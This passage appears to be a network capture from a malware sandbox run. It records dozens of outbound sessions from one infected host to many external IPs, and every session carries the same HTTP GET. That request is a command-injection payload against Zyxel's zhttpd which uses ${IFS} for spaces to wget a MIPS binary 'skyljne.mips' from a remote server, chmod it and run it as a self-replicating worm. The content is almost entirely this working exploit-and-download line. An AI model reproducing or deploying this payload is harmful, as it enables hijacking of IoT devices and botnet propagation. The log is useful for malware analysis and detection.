                                        Jan 14, 2024 16:18:58.791275024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8353192.168.2.1336322193.84.67.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.791352034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8354192.168.2.1339566157.122.185.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.791409969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8355192.168.2.135329867.20.118.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.791455984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8356192.168.2.133868485.134.230.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.791531086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8357192.168.2.135910076.208.82.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.791600943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8358192.168.2.1333400203.120.41.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.791642904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8359192.168.2.1337694103.95.126.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.791703939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8360192.168.2.1354818167.235.133.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.791734934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8361192.168.2.133952898.65.101.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.791789055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8362192.168.2.1332950117.102.201.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.791841030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8363192.168.2.1345614168.167.158.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.791913986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8364192.168.2.1336002117.110.171.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.791939974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8365192.168.2.1360628157.0.107.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792037964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8366192.168.2.1346692186.233.171.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792078972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8367192.168.2.1336952178.254.30.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792146921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8368192.168.2.1338178202.91.136.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792222977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8369192.168.2.1351088166.224.66.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792294979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8370192.168.2.136093296.206.109.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792331934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8371192.168.2.1335782154.130.248.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792417049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8372192.168.2.13416921.37.173.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792448997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8373192.168.2.1332932150.1.128.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792507887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8374192.168.2.1349214206.141.155.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792566061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8375192.168.2.1346170131.126.158.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792601109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8376192.168.2.1343990143.8.200.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792653084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8377192.168.2.1355624211.227.29.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792702913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8378192.168.2.1359712198.172.59.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792782068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8379192.168.2.134135042.156.65.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792814016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8380192.168.2.1344260177.241.180.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792897940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8381192.168.2.134533672.116.135.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.792963028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8382192.168.2.134491889.72.39.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793016911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8383192.168.2.135554079.102.121.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793056011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8384192.168.2.1351978110.143.129.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793137074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8385192.168.2.134580682.209.190.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793176889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8386192.168.2.1359096197.192.0.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793215036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8387192.168.2.134718881.22.108.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793283939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8388192.168.2.1341294221.116.208.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793332100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8389192.168.2.1359892208.203.39.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793401957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8390192.168.2.1340780113.74.20.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793464899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8391192.168.2.13477441.214.117.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793539047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8392192.168.2.1360952168.240.52.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793617010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8393192.168.2.1337568206.219.157.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793658972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8394192.168.2.1349602116.169.103.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793715954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8395192.168.2.1350348161.216.26.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793787003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8396192.168.2.1357508216.232.223.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793837070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8397192.168.2.1355942143.129.48.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793884039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8398192.168.2.1344196184.168.106.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.793965101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8399192.168.2.1360474157.67.69.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.794032097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8400192.168.2.1354790174.38.198.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.794086933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8401192.168.2.134442674.127.126.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.794182062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8402192.168.2.1353668120.172.48.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.794202089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8403192.168.2.1352106123.71.86.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.794230938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8404192.168.2.1357684131.175.226.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.794306993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8405192.168.2.1336208223.244.171.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.794349909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8406192.168.2.135483299.70.244.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.794414043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8407192.168.2.1334646182.27.24.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.794475079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8408192.168.2.1351334202.125.156.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.794559956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8409192.168.2.1346910204.91.88.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.794636011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8410192.168.2.1350676149.236.26.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.794687033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8411192.168.2.133881435.12.59.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.794706106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8412192.168.2.133324449.125.19.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.794754982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8413192.168.2.1360180179.32.125.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.794806957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8414192.168.2.1346564131.34.88.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.794857025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8415192.168.2.1343150160.208.204.234443
                                        TimestampBytes transferredDirectionData
